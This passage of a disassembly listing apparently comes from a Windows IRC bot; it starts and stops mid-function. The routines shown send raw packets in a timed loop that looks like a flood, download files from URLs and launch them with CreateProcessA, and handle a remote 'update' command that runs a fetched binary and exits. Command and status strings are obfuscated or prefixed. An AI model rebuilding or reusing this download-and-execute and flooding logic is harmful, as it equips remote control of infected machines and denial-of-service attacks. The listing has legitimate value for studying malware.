mov [ebp+var_C0], eax
mov eax, [ebp+var_30]
push 18h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_BC], eax
mov [ebp+var_B8], bl
mov [ebp+var_B7], 6
call dword_454314 ; ntohs
mov [ebp+var_B6], ax
lea eax, [ebp+var_C0]
push 24h
push eax
lea eax, [ebp+var_9C]
push eax
call sub_4223F0
lea eax, [ebp+var_18]
push 18h
push eax
lea eax, [ebp+var_78]
push eax
call sub_4223F0
lea eax, [ebp+var_9C]
push 3Ch
push eax
call sub_414271
mov [ebp+var_8], ax
lea eax, [ebp+var_40]
push 14h
push eax
lea eax, [ebp+var_9C]
push eax
call sub_4223F0
lea eax, [ebp+var_18]
push 18h
push eax
lea eax, [ebp+var_88]
push eax
call sub_4223F0
push 4
lea eax, [ebp+var_70]
push ebx
push eax
call sub_4221F0
add esp, 44h
lea eax, [ebp+var_9C]
push 2Ch
push eax
call sub_414271
mov [ebp+var_36], ax
lea eax, [ebp+var_40]
push 14h
push eax
lea eax, [ebp+var_9C]
push eax
call sub_4223F0
add esp, 14h
lea eax, [ebp+var_60]
push 10h
push eax
push ebx
lea eax, [ebp+var_9C]
push 3Ch
push eax
push [ebp+var_1C]
call dword_454370 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_40CDC6
push [ebp+var_D4]
inc [ebp+arg_0]
call dword_42F15C ; Sleep
call edi ; dword_42F164
sub eax, [ebp+var_24]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_D8]
jbe loc_40CA9A
jmp loc_40C9D6
; ---------------------------------------------------------------------------
loc_40CDC6: ; CODE XREF: sub_40C847+54F�j
push [ebp+var_1C]
call dword_4543AC ; closesocket
push [ebp+var_E0]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
sub_40C847 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CDE2 proc near ; DATA XREF: sub_403B2C+3EBE�o
; sub_403B2C+40EE�o
var_164C = byte ptr -164Ch
var_64C = byte ptr -64Ch
var_548 = byte ptr -548h
var_4A8 = byte ptr -4A8h
var_430 = byte ptr -430h
var_3B8 = byte ptr -3B8h
var_2B4 = dword ptr -2B4h
var_2B0 = byte ptr -2B0h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_204 = dword ptr -204h
var_200 = dword ptr -200h
var_1FC = dword ptr -1FCh
var_88 = qword ptr -88h
var_7C = qword ptr -7Ch
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = qword ptr -1Ch
var_14 = byte ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 164Ch
call sub_4220C0
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_2B4]
push 9Fh
rep movsd
push [ebp+var_22C]
mov edi, [ebp+var_2B4]
xor esi, esi
mov [ebp+arg_0], edi
inc esi
mov [eax+0BCh], esi
lea eax, [ebp+var_548]
push eax
call sub_4222F0
push 104h
lea eax, [ebp+var_3B8]
push [ebp+var_228]
push eax
call sub_4222F0
add esp, 18h
xor ebx, ebx
lea eax, [ebp+var_548]
push ebx
push ebx
push ebx
push ebx
push eax
push dword_4542B8
call dword_4541FC ; InternetOpenUrlA
cmp eax, ebx
mov [ebp+var_28], eax
jz loc_40D47E
push ebx
push ebx
push 2
push ebx
push ebx
lea eax, [ebp+var_3B8]
push 40000000h
push eax
call dword_42F060 ; CreateFileA
cmp eax, esi
mov dword ptr [ebp+var_1C+4], eax
jnb loc_40CF1D
cmp [ebp+var_200], ebx
mov esi, offset aSCouldnTOpenFi ; "%s Couldn't open file for writing: %s."
jnz short loc_40CECE
cmp [ebp+var_1FC], ebx
jnz short loc_40CED6
cmp [ebp+var_220], ebx
mov eax, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_40CEB5
mov eax, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
loc_40CEB5: ; CODE XREF: sub_40CDE2+CC�j
lea ecx, [ebp+var_3B8]
push ecx
push eax
lea eax, [ebp+var_2B0]
push esi
push eax
push edi
call sub_4104F6
add esp, 14h
loc_40CECE: ; CODE XREF: sub_40CDE2+B7�j
cmp [ebp+var_1FC], ebx
jz short loc_40CF01
loc_40CED6: ; CODE XREF: sub_40CDE2+BF�j
cmp [ebp+var_220], ebx
mov eax, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_40CEE8
mov eax, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
loc_40CEE8: ; CODE XREF: sub_40CDE2+FF�j
lea ecx, [ebp+var_3B8]
push ecx
push eax
lea eax, [ebp+var_2B0]
push esi
push eax
push edi
call sub_410491
add esp, 14h
loc_40CF01: ; CODE XREF: sub_40CDE2+F2�j
push [ebp+var_28]
call dword_454348 ; InternetCloseHandle
push [ebp+var_230]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
loc_40CF1D: ; CODE XREF: sub_40CDE2+A6�j
mov edi, dword_42F164
xor esi, esi
call edi ; dword_42F164
push 7D000h
mov dword ptr [ebp+var_C+4], eax
call sub_422F79
pop ecx
mov [ebp+var_2C], eax
loc_40CF38: ; CODE XREF: sub_40CDE2+1CB�j
push 1000h
lea eax, [ebp+var_164C]
push ebx
push eax
call sub_4221F0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_164C]
push 1000h
push eax
push [ebp+var_28]
call dword_454204 ; InternetReadFile
lea eax, [ebp+var_30]
push ebx
push eax
lea eax, [ebp+var_164C]
push [ebp+var_4]
push eax
push dword ptr [ebp+var_1C+4]
call dword_42F07C ; WriteFile
mov eax, 7D000h
cmp esi, eax
jnb short loc_40CFA7
sub eax, esi
cmp eax, [ebp+var_4]
jbe short loc_40CF91
mov eax, [ebp+var_4]
loc_40CF91: ; CODE XREF: sub_40CDE2+1AA�j
push eax
lea eax, [ebp+var_164C]
push eax
mov eax, [ebp+var_2C]
add eax, esi
push eax
call sub_4223F0
add esp, 0Ch
loc_40CFA7: ; CODE XREF: sub_40CDE2+1A3�j
add esi, [ebp+var_4]
cmp [ebp+var_4], ebx
ja short loc_40CF38
call edi ; dword_42F164
sub eax, dword ptr [ebp+var_C+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_2C]
div ecx
xor edx, edx
mov ecx, eax
mov eax, esi
inc ecx
div ecx
mov dword ptr [ebp+var_C+4], eax
call sub_4230B3
pop ecx
push dword ptr [ebp+var_1C+4]
call dword_42F038 ; CloseHandle
push [ebp+var_28]
call dword_454348 ; InternetCloseHandle
cmp [ebp+var_200], ebx
jnz short loc_40D050
cmp [ebp+var_1FC], ebx
jnz short loc_40D058
cmp [ebp+var_220], ebx
mov eax, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_40D006
mov eax, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
loc_40D006: ; CODE XREF: sub_40CDE2+21D�j
mov ecx, dword ptr [ebp+var_C+4]
mov dword ptr [ebp+var_1C+4], ebx
mov dword ptr [ebp+var_1C], ecx
push ecx
fild [ebp+var_1C]
push ecx
mov dword ptr [ebp+var_1C], esi
mov dword ptr [ebp+var_1C+4], ebx
lea ecx, [ebp+var_3B8]
fmul dbl_42F308
fstp [esp+7Ch+var_7C]
fild [ebp+var_1C]
push ecx
push ecx
push ecx
fmul dbl_42F308
fstp [esp+88h+var_88]
push eax
lea eax, [ebp+var_2B0]
push offset aSFileDownload_ ; "%s File download: %.1fKB to: %s @ %.1fK"...
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 24h
loc_40D050: ; CODE XREF: sub_40CDE2+208�j
cmp [ebp+var_1FC], ebx
jz short loc_40D0B4
loc_40D058: ; CODE XREF: sub_40CDE2+210�j
cmp [ebp+var_220], ebx
mov eax, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_40D06A
mov eax, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
loc_40D06A: ; CODE XREF: sub_40CDE2+281�j
mov ecx, dword ptr [ebp+var_C+4]
mov dword ptr [ebp+var_C+4], ebx
mov dword ptr [ebp+var_C], ecx
push ecx
fild [ebp+var_C]
push ecx
mov dword ptr [ebp+var_C], esi
mov dword ptr [ebp+var_C+4], ebx
lea ecx, [ebp+var_3B8]
fmul dbl_42F308
fstp [esp+7Ch+var_7C]
fild [ebp+var_C]
push ecx
push ecx
push ecx
fmul dbl_42F308
fstp [esp+88h+var_88]
push eax
lea eax, [ebp+var_2B0]
push offset aSFileDownload_ ; "%s File download: %.1fKB to: %s @ %.1fK"...
push eax
push [ebp+arg_0]
call sub_410491
add esp, 24h
loc_40D0B4: ; CODE XREF: sub_40CDE2+274�j
cmp [ebp+var_220], ebx
jnz loc_40D393
cmp [ebp+var_21C], ebx
jz loc_40D4FF
mov esi, [ebp+var_218]
lea eax, [ebp+var_3B8]
push 104h
push eax
lea eax, [ebp+var_64C]
push eax
call sub_4222F0
add esp, 0Ch
lea eax, [ebp+var_64C]
push eax
call dword_45429C ; PathRemoveFileSpecA
test eax, eax
jnz short loc_40D160
cmp [ebp+var_200], ebx
mov esi, dword_42F068
mov edi, offset aSCouldnTParseP ; "%s Couldn't parse path, error: <%d>"
jnz short loc_40D134
cmp [ebp+var_1FC], ebx
jnz short loc_40D140
call esi ; dword_42F068
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push edi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_40D134: ; CODE XREF: sub_40CDE2+32D�j
cmp [ebp+var_1FC], ebx
jz loc_40D224
loc_40D140: ; CODE XREF: sub_40CDE2+335�j
call esi ; dword_42F068
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push edi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 14h
jmp loc_40D224
; ---------------------------------------------------------------------------
loc_40D160: ; CODE XREF: sub_40CDE2+31A�j
push 44h
lea eax, [ebp+var_74]
push ebx
push eax
call sub_4221F0
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_4221F0
add esp, 18h
lea eax, [ebp+var_24]
neg esi
push eax
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_64C]
push eax
push ebx
sbb esi, esi
push ebx
push ebx
and esi, 0FFFFFFFBh
push ebx
lea eax, [ebp+var_3B8]
push ebx
add esi, 5
push eax
push ebx
mov [ebp+var_74], 44h
mov [ebp+var_48], 1
mov [ebp+var_44], si
call dword_42F078 ; CreateProcessA
test eax, eax
jnz short loc_40D22E
cmp [ebp+var_200], ebx
mov esi, dword_42F068
mov edi, offset aSFailedToCreat ; "%s Failed to create process: \"%s\", erro"...
jnz short loc_40D1FA
cmp [ebp+var_1FC], ebx
jnz short loc_40D202
call esi ; dword_42F068
push eax
lea eax, [ebp+var_3B8]
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push edi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 18h
loc_40D1FA: ; CODE XREF: sub_40CDE2+3EC�j
cmp [ebp+var_1FC], ebx
jz short loc_40D224
loc_40D202: ; CODE XREF: sub_40CDE2+3F4�j
call esi ; dword_42F068
push eax
lea eax, [ebp+var_3B8]
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push edi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 18h
loc_40D224: ; CODE XREF: sub_40CDE2+358�j
; sub_40CDE2+379�j ...
xor eax, eax
pop edi
pop esi
inc eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40D22E: ; CODE XREF: sub_40CDE2+3D9�j
call edi ; dword_42F164
cmp [ebp+var_200], ebx
mov dword ptr [ebp+var_C+4], eax
mov esi, offset aSCreatedProces ; "%s Created process: \"%s\", PID: <%d>"
jnz short loc_40D26A
cmp [ebp+var_1FC], ebx
jnz short loc_40D272
push dword ptr [ebp+var_1C]
lea eax, [ebp+var_3B8]
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 18h
loc_40D26A: ; CODE XREF: sub_40CDE2+45C�j
cmp [ebp+var_1FC], ebx
jz short loc_40D294
loc_40D272: ; CODE XREF: sub_40CDE2+464�j
push dword ptr [ebp+var_1C]
lea eax, [ebp+var_3B8]
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push esi
push eax
push [ebp+arg_0]
call sub_410491
add esp, 18h
loc_40D294: ; CODE XREF: sub_40CDE2+48E�j
cmp [ebp+var_204], ebx
jz loc_40D36E
push 0FFFFFFFFh
push [ebp+var_24]
call dword_42F064 ; WaitForSingleObject
call edi ; dword_42F164
sub eax, dword ptr [ebp+var_C+4]
xor edx, edx
mov ecx, 3E8h
push 3Ch
div ecx
xor edx, edx
mov ecx, 15180h
pop esi
mov [ebp+var_4A8], bl
div ecx
mov ecx, 0E10h
mov eax, edx
xor edx, edx
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
cmp ecx, ebx
mov esi, edx
mov edi, eax
jbe short loc_40D31E
cmp ecx, 1
mov eax, offset aHour ; " hour"
jz short loc_40D2F5
mov eax, offset aHours ; " hours"
loc_40D2F5: ; CODE XREF: sub_40CDE2+50C�j
push eax
push ecx
lea eax, [ebp+var_430]
push offset aDS ; " %d%s"
push eax
call sub_422063
lea eax, [ebp+var_430]
push eax
lea eax, [ebp+var_4A8]
push eax
call sub_423270
add esp, 18h
loc_40D31E: ; CODE XREF: sub_40CDE2+502�j
push esi
push edi
lea eax, [ebp+var_430]
push offset a_2d_2d ; " %.2d:%.2d"
push eax
call sub_422063
lea eax, [ebp+var_430]
push eax
lea eax, [ebp+var_4A8]
push eax
call sub_423270
lea eax, [ebp+var_4A8]
push eax
lea eax, [ebp+var_3B8]
push eax
push offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
lea eax, [ebp+var_2B0]
push offset aSProcessFinish ; "%s Process Finished: \"%s\", Total Runnin"...
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 30h
loc_40D36E: ; CODE XREF: sub_40CDE2+4B8�j
cmp [ebp+var_24], ebx
jz short loc_40D37C
push [ebp+var_24]
call dword_42F038 ; CloseHandle
loc_40D37C: ; CODE XREF: sub_40CDE2+58F�j
cmp [ebp+var_20], ebx
jz loc_40D4FF
push [ebp+var_20]
call dword_42F038 ; CloseHandle
jmp loc_40D4FF
; ---------------------------------------------------------------------------
loc_40D393: ; CODE XREF: sub_40CDE2+2D8�j
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_4221F0
push 44h
lea eax, [ebp+var_74]
pop esi
push esi
push ebx
push eax
call sub_4221F0
add esp, 18h
lea eax, [ebp+var_14]
mov [ebp+var_74], esi
mov [ebp+var_44], bx
push eax
lea eax, [ebp+var_74]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
lea eax, [ebp+var_3B8]
push ebx
push eax
push ebx
call dword_42F078 ; CreateProcessA
cmp eax, 1
jnz short loc_40D437
push ebx
push ebx
push ebx
push offset sub_414F1C
push ebx
push ebx
call dword_42F158 ; CreateThread
push offset dword_439540
call sub_414F91
xor eax, eax
cmp [ebp+var_214], 1
setz al
push eax
push 1
call sub_41F455
push offset aUpdateCmdRecei ; "Update cmd received: [%s!%s@root]"
push [ebp+arg_0]
call sub_41015C
add esp, 14h
push 1F4h
call dword_42F15C ; Sleep
mov ecx, [ebp+arg_0]
call sub_41012A
call dword_454258 ; WSACleanup
push ebx
call dword_42F06C ; ExitProcess
loc_40D437: ; CODE XREF: sub_40CDE2+5F5�j
cmp [ebp+var_200], ebx
mov esi, offset aSUpdateFailedE ; "%s Update failed: Error executing file:"...
jnz short loc_40D463
lea eax, [ebp+var_3B8]
push eax
push offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
lea eax, [ebp+var_2B0]
push esi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_40D463: ; CODE XREF: sub_40CDE2+660�j
cmp [ebp+var_1FC], ebx
jz loc_40D4FF
lea eax, [ebp+var_3B8]
push eax
push offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
push esi
jmp short loc_40D4ED
; ---------------------------------------------------------------------------
loc_40D47E: ; CODE XREF: sub_40CDE2+83�j
cmp [ebp+var_200], ebx
mov esi, dword_42F068
mov edi, offset aSBadUrlOrDnsEr ; "%s Bad URL or DNS Error, error: <%d>"
jnz short loc_40D4C8
cmp [ebp+var_1FC], ebx
jnz short loc_40D4D0
cmp [ebp+var_220], ebx
mov dword ptr [ebp+var_C+4], offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_40D4AF
mov dword ptr [ebp+var_C+4], offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
loc_40D4AF: ; CODE XREF: sub_40CDE2+6C4�j
call esi ; dword_42F068
push eax
lea eax, [ebp+var_2B0]
push dword ptr [ebp+var_C+4]
push edi
push eax
push [ebp+arg_0]
call sub_4104F6
add esp, 14h
loc_40D4C8: ; CODE XREF: sub_40CDE2+6AD�j
cmp [ebp+var_1FC], ebx
jz short loc_40D4FF
loc_40D4D0: ; CODE XREF: sub_40CDE2+6B5�j
cmp [ebp+var_220], ebx
mov dword ptr [ebp+var_C+4], offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_40D4E6
mov dword ptr [ebp+var_C+4], offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
loc_40D4E6: ; CODE XREF: sub_40CDE2+6FB�j
call esi ; dword_42F068
push eax
push dword ptr [ebp+var_C+4]
push edi
loc_40D4ED: ; CODE XREF: sub_40CDE2+69A�j
lea eax, [ebp+var_2B0]
push eax
push [ebp+arg_0]
call sub_410491
add esp, 14h
loc_40D4FF: ; CODE XREF: sub_40CDE2+2E4�j
; sub_40CDE2+59D�j ...
push [ebp+var_230]
call sub_41C059
pop ecx
push ebx
call dword_42F150 ; ExitThread
sub_40CDE2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40D512 proc near ; CODE XREF: sub_40D75A+31�p
; sub_40DB4B+21�p ...
mov eax, ecx
xor ecx, ecx
mov dword ptr [eax], offset off_42F310
mov [eax+4], ecx
mov [eax+0Ch], ecx
mov [eax+8], ecx
retn
sub_40D512 endp
; =============== S U B R O U T I N E =======================================
sub_40D526 proc near ; DATA XREF: .text:off_42F310�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_40D58A
test [esp+4+arg_0], 1
jz short loc_40D53C
push esi
call sub_421C78
pop ecx
loc_40D53C: ; CODE XREF: sub_40D526+D�j
mov eax, esi
pop esi
retn 4
sub_40D526 endp
; =============== S U B R O U T I N E =======================================
sub_40D542 proc near ; CODE XREF: sub_40D75A+25�p
; sub_40D810+30�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
and dword ptr [esi+0Ch], 0
mov dword ptr [esi], offset off_42F310
call sub_40D5BD
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn 4
sub_40D542 endp
; =============== S U B R O U T I N E =======================================
sub_40D566 proc near ; CODE XREF: sub_40D75A+72�p
; sub_40DA0E+11E�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
and dword ptr [esi+4], 0
and dword ptr [esi+0Ch], 0
mov dword ptr [esi], offset off_42F310
call sub_40D60A
and dword ptr [esi+8], 0
mov eax, esi
pop esi
retn 4
sub_40D566 endp
; =============== S U B R O U T I N E =======================================
sub_40D58A proc near ; CODE XREF: sub_40D526+3�p
; sub_40D75A+7A�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
mov dword ptr [esi], offset off_42F310
test eax, eax
jz short loc_40D5A1
push eax
call sub_4230B3
pop ecx
loc_40D5A1: ; CODE XREF: sub_40D58A+E�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
test eax, eax
jz short loc_40D5B3
push eax
call sub_4230B3
pop ecx
loc_40D5B3: ; CODE XREF: sub_40D58A+20�j
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
pop esi
retn
sub_40D58A endp
; =============== S U B R O U T I N E =======================================
sub_40D5BD proc near ; CODE XREF: sub_40D542+15�p
; sub_40D60A+F�p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_40D5CE
push eax
call sub_4230B3
pop ecx
loc_40D5CE: ; CODE XREF: sub_40D5BD+8�j
push [esp+4+arg_0]
call sub_422120
mov [esi+0Ch], eax
add eax, 2
push eax
call sub_422F79
mov ecx, [esi+0Ch]
mov [esi+4], eax
inc ecx
inc ecx
push ecx
push 0
push eax
call sub_4221F0
push dword ptr [esi+0Ch]
push [esp+1Ch+arg_0]
push dword ptr [esi+4]
call sub_4222F0
add esp, 20h
pop esi
retn 4
sub_40D5BD endp
; =============== S U B R O U T I N E =======================================
sub_40D60A proc near ; CODE XREF: sub_40D566+15�p
; sub_40D97A�j ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
call sub_40D989
push eax
mov ecx, esi
call sub_40D5BD
pop esi
retn 4
sub_40D60A endp
; =============== S U B R O U T I N E =======================================
sub_40D622 proc near ; CODE XREF: sub_40D66C+F�p
; sub_40DA0E+A9�p ...
arg_0 = dword ptr 4
push esi
push edi
push [esp+8+arg_0]
mov esi, ecx
call sub_422120
add [esi+0Ch], eax
mov eax, [esi+0Ch]
inc eax
push eax
call sub_422F79
pop ecx
mov edi, eax
pop ecx
push dword ptr [esi+4]
push edi
call dword_42F04C ; lstrcpyA
push [esp+8+arg_0]
push edi
call sub_423270
mov eax, [esi+4]
pop ecx
test eax, eax
pop ecx
jz short loc_40D664
push eax
call sub_4230B3
pop ecx
loc_40D664: ; CODE XREF: sub_40D622+39�j
mov [esi+4], edi
pop edi
pop esi
retn 4
sub_40D622 endp
; =============== S U B R O U T I N E =======================================
sub_40D66C proc near ; CODE XREF: sub_40DB4B+414�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
mov ecx, [esp+4+arg_0]
call sub_40D989
push eax
mov ecx, esi
call sub_40D622
pop esi
retn 4
sub_40D66C endp
; =============== S U B R O U T I N E =======================================
sub_40D684 proc near ; CODE XREF: sub_40DB4B+69�p
; sub_40DB4B+79�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx+4]
call sub_422760
pop ecx
pop ecx
retn 4
sub_40D684 endp
; =============== S U B R O U T I N E =======================================
sub_40D695 proc near ; CODE XREF: .text:0040E1F5�p
; .text:0040E3A3�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword ptr [ecx+4]
call sub_424380
pop ecx
pop ecx
retn 4
sub_40D695 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6A6 proc near ; CODE XREF: .text:0040E0D9�p
; .text:0040E0F8�p ...
var_2000 = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 2000h
call sub_4220C0
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_2000]
push [ebp+arg_4]
push 2000h
push eax
call sub_423640
mov ecx, [ebp+arg_0]
add esp, 10h
lea eax, [ebp+var_2000]
push eax
call sub_40D5BD
leave
retn
sub_40D6A6 endp
; =============== S U B R O U T I N E =======================================
sub_40D6DF proc near ; CODE XREF: sub_40DB4B+A2�p
; .text:0040E16F�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40D6ED
retn 4
sub_40D6DF endp
; =============== S U B R O U T I N E =======================================
sub_40D6ED proc near ; CODE XREF: sub_40D6DF+6�p
arg_0 = byte ptr 4
push esi
push edi
movsx edi, [esp+8+arg_0]
mov esi, ecx
push edi
push dword ptr [esi+4]
call sub_4233B0
pop ecx
test eax, eax
pop ecx
jz short loc_40D718
push edi
push dword ptr [esi+4]
call sub_4233B0
pop ecx
pop ecx
xor ecx, ecx
inc ecx
sub ecx, [esi+4]
add eax, ecx
loc_40D718: ; CODE XREF: sub_40D6ED+16�j
pop edi
pop esi
retn 8
sub_40D6ED endp
; =============== S U B R O U T I N E =======================================
sub_40D71D proc near ; CODE XREF: sub_40DB4B+38F�p
; sub_40DB4B+3A9�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40D72B
retn 4
sub_40D71D endp
; =============== S U B R O U T I N E =======================================
sub_40D72B proc near ; CODE XREF: sub_40D71D+6�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push [esp+4+arg_0]
push dword ptr [esi+4]
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_40D756
push [esp+4+arg_0]
push dword ptr [esi+4]
call sub_4235C0
pop ecx
pop ecx
xor ecx, ecx
inc ecx
sub ecx, [esi+4]
add eax, ecx
loc_40D756: ; CODE XREF: sub_40D72B+13�j
pop esi
retn 8
sub_40D72B endp
; =============== S U B R O U T I N E =======================================
sub_40D75A proc near ; CODE XREF: sub_40D7ED+17�p
; .text:0040E1CC�p ...
mov eax, offset loc_42EC00
call sub_423A68
sub esp, 18h
and dword ptr [ebp-14h], 0
push edi
mov edi, [ebp+10h]
mov [ebp-10h], ecx
cmp edi, 1
jge short loc_40D786
mov ecx, [ebp+8]
push offset byte_44D6A4
call sub_40D542
jmp short loc_40D7DB
; ---------------------------------------------------------------------------
loc_40D786: ; CODE XREF: sub_40D75A+1B�j
push ebx
push esi
lea ecx, [ebp-24h]
call sub_40D512
and dword ptr [ebp-4], 0
lea esi, [edi+1]
push esi
call sub_422F79
mov ebx, eax
push esi
push 0
push ebx
call sub_4221F0
mov eax, [ebp-10h]
push edi
mov eax, [eax+4]
add eax, [ebp+0Ch]
push eax
push ebx
call sub_4223F0
add esp, 1Ch
lea ecx, [ebp-24h]
push ebx
call sub_40D5BD
mov ecx, [ebp+8]
lea eax, [ebp-24h]
push eax
call sub_40D566
lea ecx, [ebp-24h]
call sub_40D58A
pop esi
pop ebx
loc_40D7DB: ; CODE XREF: sub_40D75A+2A�j
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop edi
mov large fs:0, ecx
leave
retn 0Ch
sub_40D75A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7ED proc near ; CODE XREF: sub_40DB4B+39C�p
; sub_40DB4B+3B6�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
call sub_41111F
sub eax, [ebp+arg_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D75A
mov eax, [ebp+arg_0]
leave
retn 8
sub_40D7ED endp
; =============== S U B R O U T I N E =======================================
sub_40D810 proc near ; CODE XREF: sub_40D95B+13�p
; .text:0040E499�p ...
mov eax, offset loc_42EC33
call sub_423A68
sub esp, 28h
push ebx
xor ebx, ebx
mov [ebp-14h], ebx
mov al, [ebp+0Bh]
push esi
push edi
mov [ebp-24h], al
mov [ebp-20h], ebx
mov [ebp-1Ch], ebx
mov [ebp-18h], ebx
push dword ptr [ecx+4]
xor esi, esi
inc esi
lea ecx, [ebp-34h]
mov [ebp-4], esi
call sub_40D542
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_40D989
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jz loc_40D8F7
mov edi, [ebp+10h]
loc_40D861: ; CODE XREF: sub_40D810+E1�j
mov dl, [edi]
cmp cl, dl
jnz short loc_40D86F
loc_40D867: ; CODE XREF: sub_40D810+5D�j
inc eax
mov [ebp-10h], eax
cmp [eax], dl
jz short loc_40D867
loc_40D86F: ; CODE XREF: sub_40D810+55�j
cmp byte ptr [eax], 22h
setz byte ptr [ebp+13h]
cmp [ebp+13h], bl
jz short loc_40D87F
inc eax
mov [ebp-10h], eax
loc_40D87F: ; CODE XREF: sub_40D810+69�j
lea eax, [ebp-10h]
lea ecx, [ebp-24h]
push eax
call sub_40F0D0
mov eax, [ebp-10h]
cmp [ebp+13h], bl
mov cl, [eax]
jz short loc_40D8C6
cmp cl, bl
jz short loc_40D8F7
loc_40D899: ; CODE XREF: sub_40D810+A2�j
cmp cl, 22h
jnz short loc_40D8AA
mov cl, [eax+1]
cmp cl, 20h
jz short loc_40D8B4
cmp cl, bl
jz short loc_40D8B4
loc_40D8AA: ; CODE XREF: sub_40D810+8C�j
inc eax
mov [ebp-10h], eax
mov cl, [eax]
cmp cl, bl
jnz short loc_40D899
